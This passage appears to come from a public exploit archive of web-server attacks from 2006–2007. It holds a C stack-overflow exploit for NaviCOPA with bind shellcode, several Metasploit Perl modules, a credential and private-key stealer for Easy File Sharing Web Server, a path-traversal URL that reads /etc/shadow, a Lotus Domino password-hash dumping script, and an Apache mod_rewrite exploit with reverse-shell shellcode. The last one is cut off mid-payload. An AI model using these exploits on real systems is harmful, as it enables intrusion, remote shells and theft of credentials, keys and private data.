(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include <winsock2.h>
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.com
*/
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x 13\x91\xba\x06"
"\x13\x83\xeb\xfc\xe2\xf4\x6d\xd0\xed\x5e\x79\x43\x f9\xec\x6e\xda"
"\x8d\x7f\xb5\x9e\x8d\x56\xad\x31\x7a\x16\xe9\xbb\x e9\x98\xde\xa2"
"\x8d\x4c\xb1\xbb\xed\x5a\x1a\x8e\x8d\x12\x7f\x8b\x c6\x8a\x3d\x3e"
"\xc6\x67\x96\x7b\xcc\x1e\x90\x78\xed\xe7\xaa\xee\x 22\x3b\xe4\x5f"
"\x8d\x4c\xb5\xbb\xed\x75\x1a\xb6\x4d\x98\xce\xa6\x 07\xf8\x92\x96"
"\x8d\x9a\xfd\x9e\x1a\x72\x52\x8b\xdd\x77\x1a\xf9\x 36\x98\xd1\xb6"
"\x8d\x63\x8d\x17\x8d\x53\x99\xe4\x6e\x9d\xdf\xb4\x ea\x43\x6e\x6c"
"\x60\x40\xf7\xd2\x35\x21\xf9\xcd\x75\x21\xce\xee\x f9\xc3\xf9\x71"
"\xeb\xef\xaa\xea\xf9\xc5\xce\x33\xe3\x75\x10\x57\x 0e\x11\xc4\xd0"
"\x04\xec\x41\xd2\xdf\x1a\x64\x17\x51\xec\x47\xe9\x 55\x40\xc2\xe9"
"\x45\x40\xd2\xe9\xf9\xc3\xf7\xd2\x17\x4f\xf7\xe9\x 8f\xf2\x04\xd2"
"\xa2\x09\xe1\x7d\x51\xec\x47\xd0\x16\x42\xc4\x45\x d6\x7b\x35\x17"
"\x28\xfa\xc6\x45\xd0\x40\xc4\x45\xd6\x7b\x74\xf3\x 80\x5a\xc6\x45"
"\xd0\x43\xc5\xee\x53\xec\x41\x29\x6e\xf4\xe8\x7c\x 7f\x44\x6e\x6c"
"\x53\xec\x41\xdc\x6c\x77\xf7\xd2\x65\x7e\x18\x5f\x 6c\x43\xc8\x93"
"\xca\x9a\x76\xd0\x42\x9a\x73\x8b\xc6\xe0\x3b\x44\x 44\x3e\x6f\xf8"
"\x2a\x80\x1c\xc0\x3e\xb8\x3a\x11\x6e\x61\x6f\x09\x 10\xec\xe4\xfe"
"\xf9\xc5\xca\xed\x54\x42\xc0\xeb\x6c\x12\xc0\xeb\x 53\x42\x6e\x6a"
"\x6e\xbe\x48\xbf\xc8\x40\x6e\x6c\x6c\xec\x6e\x8d\x f9\xc3\x1a\xed"
"\xfa\x90\x55\xde\xf9\xc5\xc3\x45\xd6\x7b\x61\x30\x 02\x4c\xc2\x45"
"\xd0\xec\x41\xba\x06\x13";
char buffer[BUFF_SIZE];
target list[] =
{
"XP SP2 Polish",
0x7d168877, //JMP ESP
"XP SP2 English",
0x7ca58265, //JMP ESP
"XP SP2 German",
0x7cb4d5ac, //JMP ESP
"2000 SP4 Polish",
0x77596433, //JMP ESP
"2000 SP4 English",
0x78326433 //JMP ESP
};
int main(int argc, char *argv[])
{
WSADATA wsa;
int sock, os, r_len, i,
a = (sizeof(list) / sizeof(target)) - 1;
unsigned long eip;
struct hostent *he;
struct sockaddr_in client;
printf("\n NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit\n");
printf(" Coded by h07 <[email protected]>\n");
if(argc < 3)
{
printf(" Usage: %s <host> <system>\n", argv[0]);
printf(" Sample: %s 192.168.0.1 0\n", argv[0]);
printf(" Systems..\n");
for(i = 0; i <= a; i++)
printf("[>] %d: %s\n", i, list[i].os_name);
return 1;
}
WSAStartup(MAKEWORD(2, 0), &wsa);
os = atoi(argv[2]);
if((os < 0) || (os > a))
{
printf("[-] Error: unknown target %d\n", os);
return -1;
}
eip = list[os].ret;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if((he = gethostbyname(argv[1])) == NULL)
{
printf("[-] Unable to resolve\n");
return -1;
}
client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;
if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] Error: connect()\n");
return -1;
}
r_len = 234;
memset(buffer, 0x41, r_len);
memcpy(buffer, "GET ", 4);
*((unsigned long*)(&buffer[r_len])) = eip;
memset(buffer + (r_len + 4), 0x90, 32);
strcat(buffer, shellcode);
strcat(buffer, " HTTP/1.1\r\n\r\n\x00");
//buffer["GET " + ("A" * 230) + RET + (NOP * 32) + shellcode + " HTTP/1.1\r\n\r\n\x00"]
if(send(sock, buffer, strlen(buffer), 0) != -1)
{
printf("[+] Sending buffer: OK\n");
printf(" Check your shell on %s:4444\n", argv[1]);
}
else
printf("[-] Sending buffer: failed\n");
printf(" Press enter to quit\n");
getchar();
return 0;
}
// [2006-09-27]
80 PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
##
# From the author:
# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.
##
package Msf::Exploit::privatewire_gateway_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Private Wire Gateway Buffer Overflow (win32)',
'Version' => '$Rev$',
'Authors' =>
[
'Michael Thumann <mthumann[at]ernw.de>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'PATH' => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],
},
'Payload' =>
{
'Space' => 8000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x 5c\x1b",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This exploits a buffer overflow in the ADMCREG.EXE used
in the PrivateWire Online Registration Facility. .
}),
'Refs' =>
[
['BID', '18647'],
],
'DefaultTarget' => 4,
'Targets' => [
['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL
['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL
['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL
['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL
['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL
['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL
['Debugging', 0x41414141], # Crash
],
'Keys' => ['privatewire'],
'DisclosureDate' => 'June 26 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $path = $self->GetVar('PATH');
my $path_offset = length($path)-8;
my $target = $self->Targets->[$target_idx];
my $pattern = Pex::Text::AlphaNumText(8192);
my $jmp = # add 25 to ecx and jmp
"\x6a\x19".
"\x58".
"\x01\xc1".
"\xff\xe1";
substr($pattern, 0, length($shellcode), $shellcode);
substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));
substr($pattern, 8160, length($jmp), $jmp);
my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";
$self->PrintLine(sprintf (" Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($request);
$s->Close();
return;
}
1;
# [2006-10-29]
80 Easy File Sharing Web Server 4 Remote Information Stealer Exploit
/*
================================================== =================
0-day Alternative File Stream Exploit for Easy File Share Server 4
================================================== =================
Exploit allows malicious users to grab files from the server without
being authenticated completely bypassing security.
0-day Easy File Sharing Web Server v4.0 Information Stealer
Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com
This tool demonstrates EFS Web Server's Vulnerability to Alternative
Data Stream GET requests which allow unauthorized users to download server
critical files.
Discovered and Reported: 10-30-2006
Usage: exploit <hostname/IP> [port 80=default] [Method see below]
--------PoC Methods:-----
1 = Gather all login username and passwords and email addresses.[Default]
2 = Gather Private RSA Key and Certificates for server.
3 = Gather Private Messages used by Forum Users on the server
4 = Gather Server Settings File and SMTP server info.
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h> /* Win32 API */
#include <wininet.h> /* WinInet API */
int mthd;
unsigned short httpport;
char exploit[512], exploit2[512], exploit3[512], exploit4[512];
char logmsg[512];
char endmsg[512];
HINTERNET inet; /* WinInet Internet Handle */
FILE *file;
void ExploitHTTP (HINTERNET inet, const char *host, const char *exp)
{
HINTERNET connection; /* Connection Handle */
HINTERNET request; /* Request Handle */
unsigned long flags; /* HttpOpenRequest Flags */
char buffer[BUFSIZ];
unsigned long len;
printf("HOST: %s\n", host);
printf("PORT: %i\n", httpport);
if ((connection = InternetConnect(inet, host, httpport,
NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))
== NULL)
{
printf("Failed to Connect...Exiting\n");
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT |
INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES |
INTERNET_FLAG_RELOAD;
strcat(exp, "%3A%3A%24%44%41%54%41");
request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0);
if (request == NULL)
{
printf("HTTP Open Request failed....Exiting\n");
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
printf("HTTP Send Request failed....Exiting\n");
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
printf("Exploit Sent...Dumping HTTP Return Packet...");
sleep(1000);
while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0)
{
fwrite(buffer, len, 1, file);
if (fwrite(buffer, len, 1, stdout) < 1)
{
printf("Error Outputting HTTP Return Packet\n");
}
}
InternetCloseHandle(request);
InternetCloseHandle(connection);
}
int main (int argc, char *argv[])
{
printf("\n================================================ =========================\n");
printf("0-day Easy File Sharing Web Server v4.0 Information Stealer\n");
printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n");
printf("This tool demonstrates EFS Web Server's Vulnerability to Alternative\n");
printf("Data Stream GET requests which allow unauthorized users to download server \n");
printf("critical files.\n");
printf("Discovered and Reported: 10-30-2006\n");
printf("\nUsage: %s <hostname/IP> [port 80=default] [Method see below]\n", argv[0]);
printf("--------PoC Methods:-----\n");
printf("1 = Gather all login username and passwords and email addresses.[Default]\n");
printf("2 = Gather Private RSA Key and Certificates for server.\n");
printf("3 = Gather Private Messages used by Forum Users on the server\n");
printf("4 = Gather Server Settings File and SMTP server info.\n");
printf("================================================== ==========================\n");
inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (inet == NULL)
{
printf("Error accessing InternetOpen API - Exiting...\n");
exit(1);
}
if (argc < 2)
{
printf("Invalid # of arguments...Exiting\n");
exit(1);
}
if (atoi(argv[3]) > 4)
{
mthd = 1;
}
if (atoi(argv[3]) <= 0)
{
mthd = 1;
}
mthd = atoi(argv[3]);
/* Set Up Exploits */
switch(mthd)
{
case 1:
file = fopen("Accounts.txt","a+");
sprintf(exploit, "%s", "%75%73%65%72%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n");
break;
case 2:
file = fopen("RSAKeys.txt", "a+");
sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n");
break;
case 3:
file = fopen("Messages.txt", "a+");
sprintf(exploit, "%s", "%6D%73%67%31%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n");
break;
case 4:
file = fopen("Server.txt", "a+");
sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n");
break;
}
sprintf(logmsg, "%s", argv[1]);
sprintf(logmsg, "%s", "\r\n\r\n\r\n");
fwrite(logmsg, strlen(logmsg), 1, file);
httpport = atoi(argv[2]);
ExploitHTTP(inet, argv[1], exploit);
if (mthd == 3)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%6D%73%67%32%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending 3rd Exploit...\n");
strcat(exploit3, "%6D%73%67%33%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit3);
printf("\n\n Sending final Exploit...\n");
strcat(exploit4, "%6D%73%67%34%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit4);
}
if (mthd == 2)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending final Exploit...\n");
strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit3);
}
fclose(file);
Sleep(500);
InternetCloseHandle(inet);
printf("\n\n============================================== =====\n");
printf("%s\n", endmsg);
printf("Proof Of Concept Exploit by Greg Linares\n");
printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n");
return 0;
}
// [2006-10-30]
80 NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::navicopa_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Navicopa 2.01 Buffer Overflow',
'Version' => '$Revision: 0.1 $',
'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 400,
'MinNops' => 16,
'BadChars' => "\x00\x20\x0a\x0d\x2f\x25\x3f",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a classical stack overflow in Navicopa Web Server 2.01 version
Credit to h07 for discovered this vulnerability.
This is a port to the original h07 c code.
}),
'Refs' =>
[
['BID', 20250],
],
'Targets' =>
[
['Windows 2k/XP for all service pack English',228, 0x1002c46f ], # push esp,ret in IV320009.dll
['Windows 2k/XP for all service pack Italian',227, 0x1002c46f ], # push esp,ret in IV320009.dll
],
'Keys' => ['navicopa'],
'DisclosureDate' => 'Sep 28 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $pattern = $self->MakeNops($target->[1]);
$pattern .= pack('V', $target->[2]);
$pattern .= $self->MakeNops(32);
$pattern .= $shellcode;
my $request = "GET " . $pattern ." HTTP/1.1\r\n\r\n";
$self->PrintLine(sprintf (" Trying ".$target->[0]." using push esp ret at 0x%.8x...", $target->[2]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($request);
sleep(3);
$s->Recv(-1, 10);
$s->Close();
return;
}
# [2007-01-07]
80 IP3 NetAccess < 4.1.9.6 Remote Arbitrary File Disclosure Vulnerability
I - TITLE
Security advisory: Arbitrary file disclosure vulnerability in
IP3 NetAccess leads to full system compromise
II - SUMMARY
Description: Arbitrary file disclosure vulnerability in IP3 NetAccess
leads to full system compromise
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
Date: February 11th, 2007
Severity: High
References: http://www.devtarget.org/ip3-advisory-02-2007.txt
III - OVERVIEW
IP3's NetAccess is a device created for high demand environments
such as convention centers or hotels. It handles the Internet access
and provides for instance firewalling, billing, rate-limiting as well
as various authentication mechanisms. The device is administrated via
SSH or a web-based GUI. Further information about the product can be
found online at http://www.ip3.com/poverview.htm.
IV - DETAILS
Due to inproper input validation, all NetAccess devices with a firmware version
less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability.
This vulnerability allows an unauthenticated remote attacker to abuse the
web interface and read any file on the remote system. Due to the fact that important
system files are world-readable (see bid #17698), this does include /etc/shadow
and thus leads to a full compromise of the device! In addition an attacker is
able to gain access to the proprietary code base of the device and potentially
identify as well as exploit other (yet unknown) vulnerabilities.
V - EXPLOIT CODE
The trivial vulnerability can be exploited by accessing the file "getfile.cgi"
with a relative file path such as
http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
As the input to the "filename" parameter is not properly validated accessing
this URL will disclose the contents of /etc/shadow to a remote attacker.
VI - WORKAROUND/FIX
To address this problem, the vendor has released a new firmware version
(4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess
devices are asked to install this version immediately.
As a temporary workaround, one may also limit the accessibility of the web interface
of the device to authorized personnel only. Nevertheless contacting the vendor and
installing the new firmware version is highly recommended!
VII - DISCLOSURE TIMELINE
31. December 2006 - Notified vendor
31. December 2006 - Vulnerability confirmed
17. January 2007 - Patch released
11. February 2007 - Public disclosure
# [2007-02-11]
80 Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
#!/bin/bash
#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <[email protected]>
#
# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive information such
# as (1) the password hash in the HTTPPassword field, (2) the password change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it's possible to dump all HTTPPassword hashes using the
# $defaultview view instead of $users. This saves a considerable amount of time.
#
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName: Foo
# LastName: Bar
# ShortName: fbar
# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#
# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp
# Command line
host=$1
# Local fuctions
function header() {
echo ""
echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
echo "Copyright (c) 2007 Marco Ivaldi <[email protected]>"
echo ""
}
function footer() {
echo ""
exit 0
}
function usage() {
header
echo "usage : ./raptor_dominohash <host>"
echo "example: ./raptor_dominohash 192.168.0.202"
footer
}
function notfound() {
header
echo "error : curl not found"
footer
}
# Check if curl is there
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z "$1" ]; then
usage
fi
# Remove temporary files
rm -f $tmp1
rm -f $tmp2
header
# Extract the view entries
echo "Extracting the view entries..."
while :
do
curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1
# Check grep return value
if [ $? -ne 0 ]; then
break
fi
# Go for the next page
i=`expr $i + 30`
echo -ne "\b\b\b\b\b\b\b\b$i"
done
cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2
# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
echo "No entries found on host ${host}!"
footer
fi
echo -ne "\b\b\b\b\b\b\b\bDone! "
echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
echo ""
# Perform the hash dumping
echo "Now ready to dump password hashes..."
echo ""
sleep 4
for unid in `cat $tmp2`
do
echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
echo ""
#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
echo ""
done
footer
# [2007-02-13]
80 NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::naviCopa_cgi;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Buffer Overflow in NaviCopa HTTP server 2.01 (cgi-bin)',
'Version' => '$Rev: 3818 $',
'Authors' => [ 'www.skillTube.com', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'URL' => [1, 'DATA', 'The URL to the cgi-bin', '/cgi-bin/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x26\x3d\x0a\x0d\x25\x2b\x2e\x3f",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the NaviCopa HTTP server
2.01 (release version 6th October 2006 or earlier). It is not the
same vulnerability as the one described in BID 20250.
The vulnerability was found by a member of skillTube.com and
allows reliable code execution. The only thing that may vary
is the path to the NaviCopa installation folder. On an English
version of Windows, it resides in the c:\\program files\\navicopa
directory. In that case, eip is overwritten with char 271 to 274.
To add a new target version of Windows (e.g. Spanish, Italian etc.),
you only need to change the offset to eip. As an example, in a
German version of Windows, the installation directory of navicopa is
c:\\programme\\navicopa. As a result, the path length is four characters
shorter than on an English version of Windows. As a consequence, the
offset to eip has to be increased by four.
Exploit was successfully tested against Windows 2000, XP and
Windows Vista (regardless of ASLR).
}),
'Refs' => [
['URL', 'http://www.skilltube.com'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Universal exploit for all English versions of Windows (XP,2000,Vista)', 270, 0x1002c46f], # push esp, retn
['Universal exploit for all German versions of Windows (XP,2000,Vista)', 274, 0x1002c46f], # push esp, retn
],
'Keys' => ['naviCopa'],
'DisclosureDate' => 'March 2007',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('URL');
my $target_idx = $self->GetVar('TARGET');
my $shellcode =$self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine(" Attempting to exploit target " . $target->[0]);
my $pattern = "A"x900;
my $jmp = "\xeb\x04";
substr($pattern, $target->[1] , 4, pack('V', $target->[2])); # ret
substr($pattern, $target->[1] + 42, length($jmp), $jmp);
substr($pattern, $target->[1] + 44 , 4, pack('V', $target->[2])); #edx
substr($pattern, $target->[1] + 48 , length($shellcode), $shellcode);
my $request =
"GET $target_path$pattern HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine(" Waiting for a response...");
my $r = $s->Recv(-1, 5);
$s->Close();
return;
}
1;
# [2007-03-27]
80 Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.enigmagroup.org/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [¡ã?¡À? 5.2.3790]
# (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp.
#
# D:\Apache\Apache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# shellcode µÄbadchar£¬ÎÒÕâÀÃ� �Óõģ¬Æäʵ² »ÃèÒªÄÇô¶Ã
# ÎÒ¸úµ½Ã½¸öbadcharà ŠÃ‡ 0x3fºà 0x0b ÆäËû¶¼ÊÇÒÔÇ °Éú³Éshellcodeð¹ßÃ� �Ô±£ÃôµÄ
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#
echo -e "mod_rewrite apache off-by-one overflow"
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\
# %3f to trigger the vuln
%3fA%3fA%3f\
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\
# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded
`perl -e 'print "\
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x 51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x 42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x 79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x 6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x 55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x 4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x 79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x 59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x 6d\x76\x61\x6f\
